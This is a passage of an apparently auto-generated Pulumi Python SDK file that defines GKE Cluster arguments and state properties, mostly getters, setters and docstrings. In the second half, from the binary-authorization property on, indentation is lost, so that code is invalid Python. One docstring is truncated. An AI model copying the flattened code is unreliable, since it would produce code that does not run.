def networking_mode(self) -> Optional[pulumi.Input[str]]:
    """
    Determines whether alias IPs or routes are used for pod IPs in the
    cluster. Options are `VPC_NATIVE` or `ROUTES`. `VPC_NATIVE` enables
    [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases)
    and requires the `ip_allocation_policy` block to be defined. When
    this field is left unspecified, GKE creates a `ROUTES`-based cluster
    by default.
    """
    return pulumi.get(self, "networking_mode")

@networking_mode.setter
def networking_mode(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "networking_mode", value)
@property
@pulumi.getter(name="nodeConfig")
def node_config(self) -> Optional[pulumi.Input['ClusterNodeConfigArgs']]:
    """
    Parameters for creating the default node pool. Generally, this
    field should not be used at the same time as a `container.NodePool`
    or a `node_pool` block; this configuration manages the default node
    pool, which isn't recommended to be used.
    Structure is documented below.
    """
    return pulumi.get(self, "node_config")

@node_config.setter
def node_config(self, value: Optional[pulumi.Input['ClusterNodeConfigArgs']]):
    pulumi.set(self, "node_config", value)
@property
@pulumi.getter(name="nodeLocations")
def node_locations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
    """
    List of zones the cluster's nodes are located in. Nodes must be in
    the region of their regional cluster or in the same region as their
    cluster's zone for zonal clusters. If this is specified for a zonal
    cluster, omit the cluster's zone.
    """
    return pulumi.get(self, "node_locations")

@node_locations.setter
def node_locations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
    pulumi.set(self, "node_locations", value)
@property
@pulumi.getter(name="nodePools")
def node_pools(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ClusterNodePoolArgs']]]]:
    """
    Node pools associated with this cluster.
    See container.NodePool for schema.
    **Warning:** node pools defined inside a cluster can't be changed (or added/removed) after
    cluster creation without deleting and recreating the entire cluster. Unless you absolutely need the ability
    to say "these are the _only_ node pools associated with this cluster", use the
    container.NodePool resource instead of this property.
    """
    return pulumi.get(self, "node_pools")

@node_pools.setter
def node_pools(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ClusterNodePoolArgs']]]]):
    pulumi.set(self, "node_pools", value)
@property
@pulumi.getter(name="nodeVersion")
def node_version(self) -> Optional[pulumi.Input[str]]:
    """
    Kubernetes version on the nodes. Must either be unset or set to the
    same value as `min_master_version` on create. Defaults to the
    default version set by GKE, which is not necessarily the latest
    version. This only affects nodes in the default node pool. While a
    fuzzy version can be specified, it's recommended that you specify
    explicit versions as the provider will see spurious diffs when
    fuzzy versions are used. See the `container.get_engine_versions`
    data source's `version_prefix` field to approximate fuzzy versions.
    To update nodes in other node pools, use the `version` attribute on the node pool.
    """
    return pulumi.get(self, "node_version")

@node_version.setter
def node_version(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "node_version", value)
@property
@pulumi.getter(name="notificationConfig")
def notification_config(self) -> Optional[pulumi.Input['ClusterNotificationConfigArgs']]:
    """
    Configuration for the
    [cluster upgrade notifications](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-upgrade-notifications)
    feature. Structure is documented below.
    """
    return pulumi.get(self, "notification_config")

@notification_config.setter
def notification_config(self, value: Optional[pulumi.Input['ClusterNotificationConfigArgs']]):
    pulumi.set(self, "notification_config", value)
@property
@pulumi.getter(name="podSecurityPolicyConfig")
def pod_security_policy_config(self) -> Optional[pulumi.Input['ClusterPodSecurityPolicyConfigArgs']]:
    """
    Configuration for the
    [PodSecurityPolicy](https://cloud.google.com/kubernetes-engine/docs/how-to/pod-security-policies) feature.
    Structure is documented below.
    """
    # NOTE(review): the generated docstring began with a stray ")" — a
    # truncated availability marker from the upstream docs; removed here.
    return pulumi.get(self, "pod_security_policy_config")

@pod_security_policy_config.setter
def pod_security_policy_config(self, value: Optional[pulumi.Input['ClusterPodSecurityPolicyConfigArgs']]):
    pulumi.set(self, "pod_security_policy_config", value)
@property
@pulumi.getter(name="privateClusterConfig")
def private_cluster_config(self) -> Optional[pulumi.Input['ClusterPrivateClusterConfigArgs']]:
    """
    Configuration for
    [private clusters](https://cloud.google.com/kubernetes-engine/docs/how-to/private-clusters),
    i.e. clusters with private nodes. Structure is documented below.
    """
    return pulumi.get(self, "private_cluster_config")

@private_cluster_config.setter
def private_cluster_config(self, value: Optional[pulumi.Input['ClusterPrivateClusterConfigArgs']]):
    pulumi.set(self, "private_cluster_config", value)
@property
@pulumi.getter(name="privateIpv6GoogleAccess")
def private_ipv6_google_access(self) -> Optional[pulumi.Input[str]]:
    """
    Desired state of IPv6 connectivity to Google Services. By default
    there is no private IPv6 access to or from Google Services (all
    access will be via IPv4).
    """
    return pulumi.get(self, "private_ipv6_google_access")

@private_ipv6_google_access.setter
def private_ipv6_google_access(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "private_ipv6_google_access", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
    """
    ID of the project in which the resource belongs. Falls back to the
    provider project when not provided.
    """
    return pulumi.get(self, "project")

@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "project", value)
@property
@pulumi.getter(name="releaseChannel")
def release_channel(self) -> Optional[pulumi.Input['ClusterReleaseChannelArgs']]:
    """
    Options for the
    [Release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels)
    feature, which provide more control over automatic upgrades of your
    GKE clusters. When updating this field, GKE imposes specific version
    requirements. See
    [Selecting a new release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels#selecting_a_new_release_channel)
    for more details; the `container.get_engine_versions` datasource can
    provide the default version for a channel. Note that removing the
    `release_channel` field from your config will cause the provider to
    stop managing your cluster's release channel, but will not unenroll
    it. Instead, use the `"UNSPECIFIED"` channel.
    Structure is documented below.
    """
    return pulumi.get(self, "release_channel")

@release_channel.setter
def release_channel(self, value: Optional[pulumi.Input['ClusterReleaseChannelArgs']]):
    pulumi.set(self, "release_channel", value)
@property
@pulumi.getter(name="removeDefaultNodePool")
def remove_default_node_pool(self) -> Optional[pulumi.Input[bool]]:
    """
    When `true`, deletes the default node pool upon cluster creation.
    If you're using `container.NodePool` resources with no default node
    pool, this should be set to `true`, alongside setting
    `initial_node_count` to at least `1`.
    """
    return pulumi.get(self, "remove_default_node_pool")

@remove_default_node_pool.setter
def remove_default_node_pool(self, value: Optional[pulumi.Input[bool]]):
    pulumi.set(self, "remove_default_node_pool", value)
@property
@pulumi.getter(name="resourceLabels")
def resource_labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
    """
    GCE resource labels (a map of key/value pairs) applied to the cluster.
    """
    return pulumi.get(self, "resource_labels")

@resource_labels.setter
def resource_labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
    pulumi.set(self, "resource_labels", value)
@property
@pulumi.getter(name="resourceUsageExportConfig")
def resource_usage_export_config(self) -> Optional[pulumi.Input['ClusterResourceUsageExportConfigArgs']]:
    """
    Configuration for the
    [ResourceUsageExportConfig](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-usage-metering)
    feature. Structure is documented below.
    """
    return pulumi.get(self, "resource_usage_export_config")

@resource_usage_export_config.setter
def resource_usage_export_config(self, value: Optional[pulumi.Input['ClusterResourceUsageExportConfigArgs']]):
    pulumi.set(self, "resource_usage_export_config", value)
@property
@pulumi.getter
def subnetwork(self) -> Optional[pulumi.Input[str]]:
    """
    Name or self_link of the Google Compute Engine subnetwork in which
    the cluster's instances are launched.
    """
    return pulumi.get(self, "subnetwork")

@subnetwork.setter
def subnetwork(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "subnetwork", value)
@property
@pulumi.getter(name="verticalPodAutoscaling")
def vertical_pod_autoscaling(self) -> Optional[pulumi.Input['ClusterVerticalPodAutoscalingArgs']]:
    """
    Vertical Pod Autoscaling settings; the feature automatically adjusts
    the resources of pods controlled by it. Structure is documented below.
    """
    return pulumi.get(self, "vertical_pod_autoscaling")

@vertical_pod_autoscaling.setter
def vertical_pod_autoscaling(self, value: Optional[pulumi.Input['ClusterVerticalPodAutoscalingArgs']]):
    pulumi.set(self, "vertical_pod_autoscaling", value)
@property
@pulumi.getter(name="workloadIdentityConfig")
def workload_identity_config(self) -> Optional[pulumi.Input['ClusterWorkloadIdentityConfigArgs']]:
    """
    Workload Identity settings; the feature allows Kubernetes service
    accounts to act as a user-managed
    [Google IAM Service Account](https://cloud.google.com/iam/docs/service-accounts#user-managed_service_accounts).
    Structure is documented below.
    """
    return pulumi.get(self, "workload_identity_config")

@workload_identity_config.setter
def workload_identity_config(self, value: Optional[pulumi.Input['ClusterWorkloadIdentityConfigArgs']]):
    pulumi.set(self, "workload_identity_config", value)
@pulumi.input_type
class _ClusterState:
def __init__(__self__, *,
             addons_config: Optional[pulumi.Input['ClusterAddonsConfigArgs']] = None,
             authenticator_groups_config: Optional[pulumi.Input['ClusterAuthenticatorGroupsConfigArgs']] = None,
             cluster_autoscaling: Optional[pulumi.Input['ClusterClusterAutoscalingArgs']] = None,
             cluster_ipv4_cidr: Optional[pulumi.Input[str]] = None,
             cluster_telemetry: Optional[pulumi.Input['ClusterClusterTelemetryArgs']] = None,
             confidential_nodes: Optional[pulumi.Input['ClusterConfidentialNodesArgs']] = None,
             database_encryption: Optional[pulumi.Input['ClusterDatabaseEncryptionArgs']] = None,
             datapath_provider: Optional[pulumi.Input[str]] = None,
             default_max_pods_per_node: Optional[pulumi.Input[int]] = None,
             default_snat_status: Optional[pulumi.Input['ClusterDefaultSnatStatusArgs']] = None,
             description: Optional[pulumi.Input[str]] = None,
             dns_config: Optional[pulumi.Input['ClusterDnsConfigArgs']] = None,
             enable_autopilot: Optional[pulumi.Input[bool]] = None,
             enable_binary_authorization: Optional[pulumi.Input[bool]] = None,
             enable_intranode_visibility: Optional[pulumi.Input[bool]] = None,
             enable_kubernetes_alpha: Optional[pulumi.Input[bool]] = None,
             enable_l4_ilb_subsetting: Optional[pulumi.Input[bool]] = None,
             enable_legacy_abac: Optional[pulumi.Input[bool]] = None,
             enable_shielded_nodes: Optional[pulumi.Input[bool]] = None,
             enable_tpu: Optional[pulumi.Input[bool]] = None,
             endpoint: Optional[pulumi.Input[str]] = None,
             identity_service_config: Optional[pulumi.Input['ClusterIdentityServiceConfigArgs']] = None,
             initial_node_count: Optional[pulumi.Input[int]] = None,
             ip_allocation_policy: Optional[pulumi.Input['ClusterIpAllocationPolicyArgs']] = None,
             label_fingerprint: Optional[pulumi.Input[str]] = None,
             location: Optional[pulumi.Input[str]] = None,
             logging_config: Optional[pulumi.Input['ClusterLoggingConfigArgs']] = None,
             logging_service: Optional[pulumi.Input[str]] = None,
             maintenance_policy: Optional[pulumi.Input['ClusterMaintenancePolicyArgs']] = None,
             master_auth: Optional[pulumi.Input['ClusterMasterAuthArgs']] = None,
             master_authorized_networks_config: Optional[pulumi.Input['ClusterMasterAuthorizedNetworksConfigArgs']] = None,
             master_version: Optional[pulumi.Input[str]] = None,
             min_master_version: Optional[pulumi.Input[str]] = None,
             monitoring_config: Optional[pulumi.Input['ClusterMonitoringConfigArgs']] = None,
             monitoring_service: Optional[pulumi.Input[str]] = None,
             name: Optional[pulumi.Input[str]] = None,
             network: Optional[pulumi.Input[str]] = None,
             network_policy: Optional[pulumi.Input['ClusterNetworkPolicyArgs']] = None,
             networking_mode: Optional[pulumi.Input[str]] = None,
             node_config: Optional[pulumi.Input['ClusterNodeConfigArgs']] = None,
             node_locations: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
             node_pools: Optional[pulumi.Input[Sequence[pulumi.Input['ClusterNodePoolArgs']]]] = None,
             node_version: Optional[pulumi.Input[str]] = None,
             notification_config: Optional[pulumi.Input['ClusterNotificationConfigArgs']] = None,
             operation: Optional[pulumi.Input[str]] = None,
             pod_security_policy_config: Optional[pulumi.Input['ClusterPodSecurityPolicyConfigArgs']] = None,
             private_cluster_config: Optional[pulumi.Input['ClusterPrivateClusterConfigArgs']] = None,
             private_ipv6_google_access: Optional[pulumi.Input[str]] = None,
             project: Optional[pulumi.Input[str]] = None,
             release_channel: Optional[pulumi.Input['ClusterReleaseChannelArgs']] = None,
             remove_default_node_pool: Optional[pulumi.Input[bool]] = None,
             resource_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
             resource_usage_export_config: Optional[pulumi.Input['ClusterResourceUsageExportConfigArgs']] = None,
             self_link: Optional[pulumi.Input[str]] = None,
             services_ipv4_cidr: Optional[pulumi.Input[str]] = None,
             subnetwork: Optional[pulumi.Input[str]] = None,
             tpu_ipv4_cidr_block: Optional[pulumi.Input[str]] = None,
             vertical_pod_autoscaling: Optional[pulumi.Input['ClusterVerticalPodAutoscalingArgs']] = None,
             workload_identity_config: Optional[pulumi.Input['ClusterWorkloadIdentityConfigArgs']] = None):
    """
    Input properties used for looking up and filtering Cluster resources.

    Every argument is optional; only arguments explicitly supplied (i.e. not
    ``None``) are recorded on the state object via ``pulumi.set``. The meaning
    of each individual field is documented on the corresponding property
    getter of this class.
    """
    # Map each constructor argument to its state-field name, in declaration
    # order, then record only the values that were explicitly provided.
    _provided = {
        "addons_config": addons_config,
        "authenticator_groups_config": authenticator_groups_config,
        "cluster_autoscaling": cluster_autoscaling,
        "cluster_ipv4_cidr": cluster_ipv4_cidr,
        "cluster_telemetry": cluster_telemetry,
        "confidential_nodes": confidential_nodes,
        "database_encryption": database_encryption,
        "datapath_provider": datapath_provider,
        "default_max_pods_per_node": default_max_pods_per_node,
        "default_snat_status": default_snat_status,
        "description": description,
        "dns_config": dns_config,
        "enable_autopilot": enable_autopilot,
        "enable_binary_authorization": enable_binary_authorization,
        "enable_intranode_visibility": enable_intranode_visibility,
        "enable_kubernetes_alpha": enable_kubernetes_alpha,
        "enable_l4_ilb_subsetting": enable_l4_ilb_subsetting,
        "enable_legacy_abac": enable_legacy_abac,
        "enable_shielded_nodes": enable_shielded_nodes,
        "enable_tpu": enable_tpu,
        "endpoint": endpoint,
        "identity_service_config": identity_service_config,
        "initial_node_count": initial_node_count,
        "ip_allocation_policy": ip_allocation_policy,
        "label_fingerprint": label_fingerprint,
        "location": location,
        "logging_config": logging_config,
        "logging_service": logging_service,
        "maintenance_policy": maintenance_policy,
        "master_auth": master_auth,
        "master_authorized_networks_config": master_authorized_networks_config,
        "master_version": master_version,
        "min_master_version": min_master_version,
        "monitoring_config": monitoring_config,
        "monitoring_service": monitoring_service,
        "name": name,
        "network": network,
        "network_policy": network_policy,
        "networking_mode": networking_mode,
        "node_config": node_config,
        "node_locations": node_locations,
        "node_pools": node_pools,
        "node_version": node_version,
        "notification_config": notification_config,
        "operation": operation,
        "pod_security_policy_config": pod_security_policy_config,
        "private_cluster_config": private_cluster_config,
        "private_ipv6_google_access": private_ipv6_google_access,
        "project": project,
        "release_channel": release_channel,
        "remove_default_node_pool": remove_default_node_pool,
        "resource_labels": resource_labels,
        "resource_usage_export_config": resource_usage_export_config,
        "self_link": self_link,
        "services_ipv4_cidr": services_ipv4_cidr,
        "subnetwork": subnetwork,
        "tpu_ipv4_cidr_block": tpu_ipv4_cidr_block,
        "vertical_pod_autoscaling": vertical_pod_autoscaling,
        "workload_identity_config": workload_identity_config,
    }
    for _field, _value in _provided.items():
        if _value is not None:
            pulumi.set(__self__, _field, _value)
@property
@pulumi.getter(name="addonsConfig")
def addons_config(self) -> Optional[pulumi.Input['ClusterAddonsConfigArgs']]:
    """
    The configuration for addons supported by GKE.
    Structure is documented below.
    """
    return pulumi.get(self, "addons_config")

@addons_config.setter
def addons_config(self, value: Optional[pulumi.Input['ClusterAddonsConfigArgs']]):
    """Setter for ``addons_config``; see the property getter for details."""
    pulumi.set(self, "addons_config", value)
@property
@pulumi.getter(name="authenticatorGroupsConfig")
def authenticator_groups_config(self) -> Optional[pulumi.Input['ClusterAuthenticatorGroupsConfigArgs']]:
    """
    Configuration for the
    [Google Groups for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control#groups-setup-gsuite) feature.
    Structure is documented below.
    """
    return pulumi.get(self, "authenticator_groups_config")

@authenticator_groups_config.setter
def authenticator_groups_config(self, value: Optional[pulumi.Input['ClusterAuthenticatorGroupsConfigArgs']]):
    """Setter for ``authenticator_groups_config``; see the property getter for details."""
    pulumi.set(self, "authenticator_groups_config", value)
@property
@pulumi.getter(name="clusterAutoscaling")
def cluster_autoscaling(self) -> Optional[pulumi.Input['ClusterClusterAutoscalingArgs']]:
    """
    Per-cluster configuration of Node Auto-Provisioning with Cluster Autoscaler to
    automatically adjust the size of the cluster and create/delete node pools based
    on the current needs of the cluster's workload. See the
    [guide to using Node Auto-Provisioning](https://cloud.google.com/kubernetes-engine/docs/how-to/node-auto-provisioning)
    for more details. Structure is documented below.
    """
    return pulumi.get(self, "cluster_autoscaling")

@cluster_autoscaling.setter
def cluster_autoscaling(self, value: Optional[pulumi.Input['ClusterClusterAutoscalingArgs']]):
    """Setter for ``cluster_autoscaling``; see the property getter for details."""
    pulumi.set(self, "cluster_autoscaling", value)
@property
@pulumi.getter(name="clusterIpv4Cidr")
def cluster_ipv4_cidr(self) -> Optional[pulumi.Input[str]]:
    """
    The IP address range of the Kubernetes pods
    in this cluster in CIDR notation (e.g. `10.96.0.0/14`). Leave blank to have one
    automatically chosen or specify a `/14` block in `10.0.0.0/8`. This field will
    only work for routes-based clusters, where `ip_allocation_policy` is not defined.
    """
    return pulumi.get(self, "cluster_ipv4_cidr")

@cluster_ipv4_cidr.setter
def cluster_ipv4_cidr(self, value: Optional[pulumi.Input[str]]):
    """Setter for ``cluster_ipv4_cidr``; see the property getter for details."""
    pulumi.set(self, "cluster_ipv4_cidr", value)
@property
@pulumi.getter(name="clusterTelemetry")
def cluster_telemetry(self) -> Optional[pulumi.Input['ClusterClusterTelemetryArgs']]:
    """
    Configuration for the
    [ClusterTelemetry](https://cloud.google.com/monitoring/kubernetes-engine/installing#controlling_the_collection_of_application_logs) feature.
    Structure is documented below.
    """
    return pulumi.get(self, "cluster_telemetry")

@cluster_telemetry.setter
def cluster_telemetry(self, value: Optional[pulumi.Input['ClusterClusterTelemetryArgs']]):
    """Setter for ``cluster_telemetry``; see the property getter for details."""
    pulumi.set(self, "cluster_telemetry", value)
@property
@pulumi.getter(name="confidentialNodes")
def confidential_nodes(self) -> Optional[pulumi.Input['ClusterConfidentialNodesArgs']]:
    """
    Configuration for [Confidential Nodes](https://cloud.google.com/kubernetes-engine/docs/how-to/confidential-gke-nodes) feature. Structure is documented below.
    """
    return pulumi.get(self, "confidential_nodes")

@confidential_nodes.setter
def confidential_nodes(self, value: Optional[pulumi.Input['ClusterConfidentialNodesArgs']]):
    """Setter for ``confidential_nodes``; see the property getter for details."""
    pulumi.set(self, "confidential_nodes", value)
@property
@pulumi.getter(name="databaseEncryption")
def database_encryption(self) -> Optional[pulumi.Input['ClusterDatabaseEncryptionArgs']]:
    """
    Application-layer secrets (database) encryption settings. Structure is documented below.
    """
    return pulumi.get(self, "database_encryption")

@database_encryption.setter
def database_encryption(self, value: Optional[pulumi.Input['ClusterDatabaseEncryptionArgs']]):
    """Setter for ``database_encryption``; see the property getter for details."""
    pulumi.set(self, "database_encryption", value)
@property
@pulumi.getter(name="datapathProvider")
def datapath_provider(self) -> Optional[pulumi.Input[str]]:
    """
    The desired datapath provider for this cluster. By default, uses the IPTables-based kube-proxy implementation.
    """
    return pulumi.get(self, "datapath_provider")

@datapath_provider.setter
def datapath_provider(self, value: Optional[pulumi.Input[str]]):
    """Setter for ``datapath_provider``; see the property getter for details."""
    pulumi.set(self, "datapath_provider", value)
@property
@pulumi.getter(name="defaultMaxPodsPerNode")
def default_max_pods_per_node(self) -> Optional[pulumi.Input[int]]:
    """
    The default maximum number of pods
    per node in this cluster. This doesn't work on "routes-based" clusters, clusters
    that don't have IP Aliasing enabled. See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/how-to/flexible-pod-cidr)
    for more information.
    """
    return pulumi.get(self, "default_max_pods_per_node")

@default_max_pods_per_node.setter
def default_max_pods_per_node(self, value: Optional[pulumi.Input[int]]):
    """Setter for ``default_max_pods_per_node``; see the property getter for details."""
    pulumi.set(self, "default_max_pods_per_node", value)
@property
@pulumi.getter(name="defaultSnatStatus")
def default_snat_status(self) -> Optional[pulumi.Input['ClusterDefaultSnatStatusArgs']]:
    """
    [GKE SNAT](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-masquerade-agent#how_ipmasq_works) DefaultSnatStatus contains the desired state of whether default sNAT should be disabled on the cluster, [API doc](https://cloud.google.com/kubernetes-engine/docs/reference/rest/v1beta1/projects.locations.clusters#networkconfig). Structure is documented below.
    """
    return pulumi.get(self, "default_snat_status")

@default_snat_status.setter
def default_snat_status(self, value: Optional[pulumi.Input['ClusterDefaultSnatStatusArgs']]):
    """Setter for ``default_snat_status``; see the property getter for details."""
    pulumi.set(self, "default_snat_status", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
    """
    Description of the cluster.
    """
    return pulumi.get(self, "description")

@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
    """Setter for ``description``; see the property getter for details."""
    pulumi.set(self, "description", value)
@property
@pulumi.getter(name="dnsConfig")
def dns_config(self) -> Optional[pulumi.Input['ClusterDnsConfigArgs']]:
    """
    Configuration for [Using Cloud DNS for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/cloud-dns). Structure is documented below.
    """
    return pulumi.get(self, "dns_config")

@dns_config.setter
def dns_config(self, value: Optional[pulumi.Input['ClusterDnsConfigArgs']]):
    """Setter for ``dns_config``; see the property getter for details."""
    pulumi.set(self, "dns_config", value)
@property
@pulumi.getter(name="enableAutopilot")
def enable_autopilot(self) -> Optional[pulumi.Input[bool]]:
    """
    Enable Autopilot for this cluster. Defaults to `false`.
    Note that when this option is enabled, certain features of Standard GKE are not available.
    See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-overview#comparison)
    for available features.
    """
    return pulumi.get(self, "enable_autopilot")

@enable_autopilot.setter
def enable_autopilot(self, value: Optional[pulumi.Input[bool]]):
    """Setter for ``enable_autopilot``; see the property getter for details."""
    pulumi.set(self, "enable_autopilot", value)
@property
@pulumi.getter(name="enableBinaryAuthorization")
def enable_binary_authorization(self) -> Optional[pulumi.Input[bool]]:
"""
Enable Binary Authorization for this cluster.
If enabled, all container images will be validated by Google Binary Authorization.
"""
return pulumi.get(self, "enable_binary_authorization")
@enable_binary_authorization.setter
def enable_binary_authorization(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_binary_authorization", value)
@property
@pulumi.getter(name="enableIntranodeVisibility")
def enable_intranode_visibility(self) -> Optional[pulumi.Input[bool]]:
"""
Whether Intra-node visibility is enabled for this cluster. This makes same node pod to pod traffic visible for VPC network.
"""
return pulumi.get(self, "enable_intranode_visibility")
@enable_intranode_visibility.setter
def enable_intranode_visibility(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_intranode_visibility", value)
@property
@pulumi.getter(name="enableKubernetesAlpha")
def enable_kubernetes_alpha(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to enable Kubernetes Alpha features for
this cluster. Note that when this option is enabled, the cluster cannot be upgraded
and will be automatically deleted after 30 days.
"""
return pulumi.get(self, "enable_kubernetes_alpha")
@enable_kubernetes_alpha.setter
def enable_kubernetes_alpha(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_kubernetes_alpha", value)
@property
@pulumi.getter(name="enableL4IlbSubsetting")
def enable_l4_ilb_subsetting(self) -> Optional[pulumi.Input[bool]]:
"""
Whether L4ILB Subsetting is enabled for this cluster.
"""
return pulumi.get(self, "enable_l4_ilb_subsetting")
@enable_l4_ilb_subsetting.setter
def enable_l4_ilb_subsetting(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_l4_ilb_subsetting", value)
@property
@pulumi.getter(name="enableLegacyAbac")
def enable_legacy_abac(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the ABAC authorizer is enabled for this cluster.
When enabled, identities in the system, including service accounts, nodes, and controllers,
will have statically granted permissions beyond those provided by the RBAC configuration or IAM.
Defaults to `false`
"""
return pulumi.get(self, "enable_legacy_abac")
@enable_legacy_abac.setter
def enable_legacy_abac(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_legacy_abac", value)
@property
@pulumi.getter(name="enableShieldedNodes")
def enable_shielded_nodes(self) -> Optional[pulumi.Input[bool]]:
"""
Enable Shielded Nodes features on all nodes in this cluster. Defaults to `true`.
"""
return pulumi.get(self, "enable_shielded_nodes")
@enable_shielded_nodes.setter
def enable_shielded_nodes(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_shielded_nodes", value)
@property
@pulumi.getter(name="enableTpu")
def enable_tpu(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to enable Cloud TPU resources in this cluster.
See the [official documentation](https://cloud.google.com/tpu/docs/kubernetes-engine-setup).
"""
return pulumi.get(self, "enable_tpu")
@enable_tpu.setter
def enable_tpu(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_tpu", value)
@property
@pulumi.getter
def endpoint(self) -> Optional[pulumi.Input[str]]:
"""
The IP address of this cluster's Kubernetes master.
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter(name="identityServiceConfig")
def identity_service_config(self) -> Optional[pulumi.Input['ClusterIdentityServiceConfigArgs']]:
"""
. Structure is documented below.
"""
return pulumi.get(self, "identity_service_config")
@identity_service_config.setter
def identity_service_config(self, value: Optional[pulumi.Input['ClusterIdentityServiceConfigArgs']]):
pulumi.set(self, "identity_service_config", value)
@property
@pulumi.getter(name="initialNodeCount")
def initial_node_count(self) -> Optional[pulumi.Input[int]]:
"""
The number of nodes to create in this
cluster's default node pool. In regional or multi-zonal clusters, this is the
number of nodes per zone. Must be set if `node_pool` is not set. If you're using
`container.NodePool` objects with no default node pool, you'll need to
set this to a value of at least `1`, alongside setting
`remove_default_node_pool` to `true`.
"""
return pulumi.get(self, "initial_node_count")
@initial_node_count.setter
def initial_node_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "initial_node_count", value)
@property
@pulumi.getter(name="ipAllocationPolicy")
def ip_allocation_policy(self) -> Optional[pulumi.Input['ClusterIpAllocationPolicyArgs']]:
"""
Configuration of cluster IP allocation for
VPC-native clusters. Adding this block enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
making the cluster VPC-native instead of routes-based. Structure is documented
below.
"""
return pulumi.get(self, "ip_allocation_policy")
@ip_allocation_policy.setter
def ip_allocation_policy(self, value: Optional[pulumi.Input['ClusterIpAllocationPolicyArgs']]):
pulumi.set(self, "ip_allocation_policy", value)
@property
@pulumi.getter(name="labelFingerprint")
def label_fingerprint(self) -> Optional[pulumi.Input[str]]:
"""
The fingerprint of the set of labels for this cluster.
"""
return pulumi.get(self, "label_fingerprint")
@label_fingerprint.setter
def label_fingerprint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "label_fingerprint", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The location (region or zone) in which the cluster
master will be created, as well as the default node location. If you specify a
zone (such as `us-central1-a`), the cluster will be a zonal cluster with a
single cluster master. If you specify a region (such as `us-west1`), the
cluster will be a regional cluster with multiple masters spread across zones in
the region, and with default node locations in those zones as well
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="loggingConfig")
def logging_config(self) -> Optional[pulumi.Input['ClusterLoggingConfigArgs']]:
"""
Logging configuration for the cluster.
Structure is documented below.
"""
return pulumi.get(self, "logging_config")
@logging_config.setter
def logging_config(self, value: Optional[pulumi.Input['ClusterLoggingConfigArgs']]):
pulumi.set(self, "logging_config", value)
@property
@pulumi.getter(name="loggingService")
def logging_service(self) -> Optional[pulumi.Input[str]]:
"""
The logging service that the cluster should
write logs to. Available options include `logging.googleapis.com`(Legacy Stackdriver),
`logging.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Logging), and `none`. Defaults to `logging.googleapis.com/kubernetes`
"""
return pulumi.get(self, "logging_service")
@logging_service.setter
def logging_service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "logging_service", value)
@property
@pulumi.getter(name="maintenancePolicy")
def maintenance_policy(self) -> Optional[pulumi.Input['ClusterMaintenancePolicyArgs']]:
"""
The maintenance policy to use for the cluster. Structure is
documented below.
"""
return pulumi.get(self, "maintenance_policy")
@maintenance_policy.setter
def maintenance_policy(self, value: Optional[pulumi.Input['ClusterMaintenancePolicyArgs']]):
pulumi.set(self, "maintenance_policy", value)
@property
@pulumi.getter(name="masterAuth")
def master_auth(self) -> Optional[pulumi.Input['ClusterMasterAuthArgs']]:
"""
The authentication information for accessing the
Kubernetes master. Some values in this block are only returned by the API if
your service account has permission to get credentials for your GKE cluster. If
you see an unexpected diff unsetting your client cert, ensure you have the
`container.clusters.getCredentials` permission.
Structure is documented below.
"""
return pulumi.get(self, "master_auth")
@master_auth.setter
def master_auth(self, value: Optional[pulumi.Input['ClusterMasterAuthArgs']]):
pulumi.set(self, "master_auth", value)
@property
@pulumi.getter(name="masterAuthorizedNetworksConfig")
def master_authorized_networks_config(self) -> Optional[pulumi.Input['ClusterMasterAuthorizedNetworksConfigArgs']]:
"""
The desired
configuration options for master authorized networks. Omit the
nested `cidr_blocks` attribute to disallow external access (except
the cluster node IPs, which GKE automatically whitelists).
Structure is documented below.
"""
return pulumi.get(self, "master_authorized_networks_config")
@master_authorized_networks_config.setter
